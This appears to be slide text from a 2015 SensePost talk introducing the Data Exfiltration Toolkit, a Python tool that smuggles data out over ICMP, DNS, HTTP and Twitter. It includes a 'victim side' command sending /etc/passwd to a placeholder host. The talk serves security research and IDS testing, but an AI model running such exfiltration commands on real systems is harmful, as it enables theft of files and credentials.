23th of October 2015

Paul Amar @SensePost

$ whoami

Data Exfiltration Toolkit (DET)

  • Python
  • Multi-threaded
  • Modular (Plugins)
  • Supports ICMP, DNS, HTTP and Twitter DMs


  • One file - (client/server)
  • Plugins based (in ./plugins)
  • Listens on specific services (DNS, HTTP, Twitter, ICMP)
  • Each module can have its own logic, Sweet eh?
  • Takes a chunk of data, XOR it and sends it.
  • Plugin chosen randomly for each 'message'

ICMP Plugin

How to use it?

Server (Attacker Side)

Client (Victim Side)

(sudo) python -v -L 
(sudo) python -f /etc/passwd -t x.x.x.x -v 

Next steps

  • Wanna contribute? PR your Plugins
  • Release this on GitHub
  • Test it against IDS (with SecData?)


Made with